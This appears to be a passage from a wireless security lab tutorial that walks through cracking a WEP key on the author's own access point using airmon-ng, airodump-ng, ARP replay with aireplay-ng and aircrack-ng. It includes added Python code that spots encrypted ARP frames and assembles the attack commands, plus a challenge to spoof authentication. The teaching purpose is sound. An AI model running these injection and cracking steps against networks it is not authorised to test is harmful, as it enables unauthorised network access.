Follow the given instructions to get started:

Bring up the wireless interface wlan0 by issuing the command ifconfig wlan0 up. Then run airmon-ng start wlan0 to create mon0, the monitor mode interface, as shown in the following screenshot. Verify that the mon0 interface has been created using the iwconfig command.

Run airodump-ng to locate our lab access point using the command airodump-ng mon0. As you can see in the following screenshot, we are able to see the Wireless Lab access point running WEP.

We are only interested in the Wireless Lab access point, so let us enter airodump-ng --bssid 00:21:91:D2:8E:25 --channel 11 --write WEPCrackingDemo mon0 to only see packets for this network. The --write directive additionally requests airodump-ng to save the packets into a pcap file.

Connect a legitimate wireless client to the access point using the WEP key abcdefabcdefabcdefabcdef12 (26 hex digits, that is, a 104-bit key). Once the client has successfully connected, airodump-ng should report it on the screen.

If you run ls in the same directory, you will be able to see files prefixed with WEPCrackingDemo-* as shown in the following screenshot. These are traffic-dump files created by airodump-ng.

If you look at the airodump-ng screen, the number of data packets listed under the #Data column is very small (only 68). In WEP cracking, we need a large number of data packets encrypted with the same key to exploit weaknesses in the protocol. So we will have to force the network to produce more data packets. To do this, we will use the aireplay-ng tool.

We will use aireplay-ng to capture ARP packets on the wireless network and inject them back into the network. Every replayed ARP request makes the network answer with an ARP response, encrypted under the same WEP key but with a fresh IV. We will be starting aireplay-ng in a separate window, as shown in the next screenshot. By replaying these packets a few thousand times, we will generate a lot of data traffic on the network. Even though aireplay-ng does not know the WEP key, it is able to identify the ARP packets by looking at the size of the packets. ARP is a fixed-header protocol, so the size of an ARP packet can be easily determined and used to identify these packets even within encrypted traffic. We will run aireplay-ng with the options discussed next. The -3 option selects the ARP replay attack, -b specifies the BSSID of our network, and -h specifies the client MAC address that we are spoofing, that is, aireplay-ng -3 -b 00:21:91:D2:8E:25 -h <client MAC> mon0, where <client MAC> is the address of the connected client reported by airodump-ng. We need to do this, as the replay attack will only work for authenticated and associated client MAC addresses.
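The size-based identification described above, as an added example that is not part of the original text and is not aireplay-ng's own code: a simplified reimplementation of the heuristic. It assumes a WEP data frame carries a 4-byte IV/key-index prefix, an 8-byte LLC/SNAP header, a 28-byte ARP payload and a 4-byte ICV after the 802.11 header, and that an ARP request goes to the broadcast address. The frames below are constructed inline (the BSSID is the lab AP from the text; the client MAC 00:11:22:33:44:55 is hypothetical), with zeroed bodies standing in for ciphertext.

```python
"""Identify WEP-encrypted ARP frames in raw 802.11 data by size alone.

Illustrative reimplementation of the heuristic (not aireplay-ng's code):
an ARP payload has a fixed size, so after WEP adds its 4-byte IV/key-index
prefix and 4-byte ICV, an encrypted ARP frame has a predictable length even
though its contents are unreadable without the key.
"""
import struct

BROADCAST = b"\xff" * 6

WEP_IV_LEN = 4        # 3-byte IV + 1-byte key index, sent in the clear
LLC_SNAP_LEN = 8      # encrypted LLC/SNAP header in front of the ARP payload
ARP_LEN = 28          # ARP over Ethernet/IPv4 is a fixed 28 bytes
WEP_ICV_LEN = 4       # CRC-32 integrity check value, encrypted
WEP_ARP_BODY_LEN = WEP_IV_LEN + LLC_SNAP_LEN + ARP_LEN + WEP_ICV_LEN  # 44 bytes


def header_len(fc0: int, fc1: int) -> int:
    """Length of the 802.11 MAC header for a data frame."""
    length = 24
    if fc0 & 0x80:            # QoS data subtype: 2 extra bytes
        length += 2
    if (fc1 & 0x03) == 0x03:  # ToDS and FromDS both set (WDS): addr4 present
        length += 6
    return length


def destination(frame: bytes) -> bytes:
    """Final destination address; which field holds it depends on ToDS/FromDS."""
    ds = frame[1] & 0x03
    if ds in (0x01, 0x03):    # ToDS set: addr3 is the destination
        return frame[16:22]
    return frame[4:10]        # FromDS or neither: addr1 is the destination


def is_wep_arp(frame: bytes) -> bool:
    """True if the frame looks like a WEP-encrypted broadcast ARP request."""
    if len(frame) < 24:
        return False
    fc0, fc1 = frame[0], frame[1]
    if (fc0 & 0x0C) != 0x08:  # type bits 0b10: data frame
        return False
    if not fc1 & 0x40:        # Protected Frame bit must be set (WEP)
        return False
    if destination(frame) != BROADCAST:
        return False
    return len(frame) - header_len(fc0, fc1) == WEP_ARP_BODY_LEN


def find_arp_candidates(frames):
    """Indices of frames an ARP replay attack could reuse."""
    return [i for i, f in enumerate(frames) if is_wep_arp(f)]


# --- constructed sample capture (not real traffic) -------------------------
BSSID = bytes.fromhex("002191D28E25")       # lab AP from the text
CLIENT = bytes.fromhex("001122334455")      # hypothetical client MAC


def build_data_frame(to_ds, from_ds, wep, qos, dst, src, body_len):
    """Assemble an 802.11 data frame with an opaque (zeroed) body."""
    fc0 = 0x88 if qos else 0x08
    fc1 = (0x01 if to_ds else 0) | (0x02 if from_ds else 0) | (0x40 if wep else 0)
    if to_ds:
        addrs = BSSID + src + dst      # addr1=BSSID, addr2=SA, addr3=DA
    else:
        addrs = dst + BSSID + src      # addr1=DA, addr2=BSSID, addr3=SA
    hdr = struct.pack("<BBH", fc0, fc1, 0) + addrs + b"\x00\x00"
    if qos:
        hdr += b"\x00\x00"
    return hdr + b"\x00" * body_len


SAMPLE_FRAMES = [
    b"\x80\x00" + b"\x00" * 70,                                     # beacon (management frame)
    build_data_frame(1, 0, True, False, BROADCAST, CLIENT, 44),     # WEP ARP request, client to AP
    build_data_frame(1, 0, True, False, BSSID, CLIENT, 44),         # unicast, same size: not ARP
    build_data_frame(0, 1, True, False, BROADCAST, CLIENT, 350),    # broadcast but far too long
    build_data_frame(0, 1, True, True, BROADCAST, CLIENT, 44),      # WEP ARP relayed by AP, QoS header
    build_data_frame(1, 0, False, False, BROADCAST, CLIENT, 40),    # open network, no WEP overhead
]

if __name__ == "__main__":
    print("ARP candidates at indices:", find_arp_candidates(SAMPLE_FRAMES))
```

The filter never decrypts anything: it keys on the Protected Frame bit, the broadcast destination and the 44-byte encrypted body, which is why a unicast frame of the same size and a broadcast frame of a different size are rejected.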
Very soon you should see that aireplay-ng was able to sniff ARP packets and has started replaying them into the network.

At this point, airodump-ng will also start registering a lot of data packets. All these sniffed packets are being stored in the WEPCrackingDemo-* files that we saw previously.

Now start aircrack-ng on WEPCrackingDemo-01.cap in a new window. This will start the aircrack-ng software and it will begin working on cracking the WEP key using the data packets in the file. Note that it is a good idea to have airodump-ng collecting the WEP packets, aireplay-ng doing the replay attack, and aircrack-ng attempting to crack the WEP key based on the captured packets, all at the same time. In this experiment, all of them are open in separate windows.

The following screenshot shows aircrack-ng working on the packets to crack the WEP key. With aireplay-ng generating traffic, this should take 5-10 minutes at most. If the number of data packets currently in the file is not sufficient, aircrack-ng will pause as shown in the following screenshot, wait for more packets to be captured, and then restart the cracking process.

Eventually aircrack-ng should be able to break the key. Once it does, it proudly displays it in the terminal and exits as shown in the following screenshot.

Note that the complexity of the key does not help: the attack is statistical, exploiting how WEP uses RC4, so any WEP key will be recovered by aircrack-ng. The only requirement is that a large enough number of data packets encrypted with this key is made available to aircrack-ng.

We set up WEP in our lab and successfully cracked the WEP key. In order to do this, we first waited for a legitimate client of the network to connect to the access point. After this, we used the aireplay-ng tool to replay ARP packets into the network. This caused the network to send ARP reply packets, greatly increasing the number of data packets sent over the air. We then used aircrack-ng to crack the WEP key by analyzing cryptographic weaknesses in these data packets.
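The target selection and command construction from the procedure above, as an added example that is not part of the original text or of the aircrack-ng project. It reads the CSV that airodump-ng writes next to the pcap (WEPCrackingDemo-01.csv), picks the WEP access point named Wireless Lab, takes an associated client from the station table for the -h option, and prints the three command lines. The CSV below is constructed to match the column layout airodump-ng uses (BSSID, timestamps, channel, Speed, Privacy, Cipher, Authentication, Power, beacon/IV counts, LAN IP, ID-length, ESSID, Key; then a station table), not captured output; the second and third access points and the client MAC 00:11:22:33:44:55 are hypothetical.

```python
"""Choose the WEP target from an airodump-ng CSV and build the attack commands.

Added example (not the page's or aircrack-ng's code). The sample text is
constructed in the shape of an airodump-ng CSV: an AP table, a blank line,
then a station table. Values are stripped of the padding airodump-ng adds.
"""

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:21:91:D2:8E:25, 2011-01-01 10:00:00, 2011-01-01 10:05:00, 11, 54, WEP, WEP, , -40, 120, 68, 0. 0. 0. 0, 12, Wireless Lab, 
AA:BB:CC:DD:EE:01, 2011-01-01 10:00:00, 2011-01-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -70, 90, 0, 0. 0. 0. 0, 7, HomeNet, 
AA:BB:CC:DD:EE:02, 2011-01-01 10:00:00, 2011-01-01 10:05:00, 11, 54, OPN, , , -65, 30, 0, 0. 0. 0. 0, 12, Wireless Lab, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2011-01-01 10:01:00, 2011-01-01 10:05:00, -50, 500, 00:21:91:D2:8E:25, Wireless Lab
66:77:88:99:AA:BB, 2011-01-01 10:02:00, 2011-01-01 10:04:00, -80, 12, (not associated), Wireless Lab
"""


def parse_sections(text):
    """Split the CSV into tables (one list of row dicts per header block)."""
    sections, header, rows = [], None, []
    for line in text.splitlines():
        if not line.strip():
            if header is not None:          # blank line ends the current table
                sections.append(rows)
                header, rows = None, []
            continue
        fields = [f.strip() for f in line.split(",")]   # ESSIDs with commas are not handled
        if header is None:
            header = fields
        else:
            rows.append(dict(zip(header, fields)))
    if header is not None:
        sections.append(rows)
    return sections


def select_target(aps, essid):
    """The WEP access point advertising essid; same-named non-WEP APs are ignored."""
    matches = [ap for ap in aps if ap["ESSID"] == essid and ap["Privacy"] == "WEP"]
    if len(matches) != 1:
        raise ValueError(f"expected exactly one WEP AP named {essid!r}, found {len(matches)}")
    return matches[0]


def associated_clients(stations, bssid):
    """Client MACs currently associated to bssid: the only valid values for -h."""
    return [s["Station MAC"] for s in stations if s["BSSID"] == bssid]


def wep_key_bits(key_hex):
    """Key size of a hex WEP key: 10 digits is 40-bit, 26 digits is 104-bit."""
    if len(key_hex) not in (10, 26) or any(c not in "0123456789abcdefABCDEF" for c in key_hex):
        raise ValueError("a hex WEP key is 10 or 26 hex digits")
    return len(key_hex) * 4


def build_commands(ap, client_mac, prefix="WEPCrackingDemo", iface="mon0"):
    """The three command lines from the procedure, filled in from the CSV."""
    bssid, channel = ap["BSSID"], ap["channel"]
    return {
        "airodump": f"airodump-ng --bssid {bssid} --channel {channel} --write {prefix} {iface}",
        "aireplay": f"aireplay-ng -3 -b {bssid} -h {client_mac} {iface}",
        "aircrack": f"aircrack-ng -b {bssid} {prefix}-01.cap",
    }


if __name__ == "__main__":
    aps, stations = parse_sections(SAMPLE_CSV)
    target = select_target(aps, "Wireless Lab")
    clients = associated_clients(stations, target["BSSID"])
    print("lab key size:", wep_key_bits("abcdefabcdefabcdefabcdef12"), "bits")
    for name, cmd in build_commands(target, clients[0]).items():
        print(f"{name}: {cmd}")
```

Selecting on Privacy as well as ESSID matters because an open network with the same name (as in the constructed sample) would otherwise be picked up, and only stations whose BSSID column is the target, not "(not associated)", are usable as the spoofed client for aireplay-ng -h.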
Note that we can also fake an authentication to the access point using the Shared Key Authentication bypass technique we learnt in the last chapter. This can come in handy if the legitimate client leaves the network: it lets us spoof an authentication and association and continue to send our replayed packets into the network.

In the previous exercise, if the legitimate client had suddenly logged off the network, we would not have been able to replay the packets, as the access point will not accept packets from unassociated clients.

Your challenge is to fake an authentication and association using the Shared Key Authentication bypass we learnt in the last chapter while WEP cracking is going on. Log off the legitimate client from the network and verify whether you are still able to inject packets into the network and whether the access point accepts and responds to them.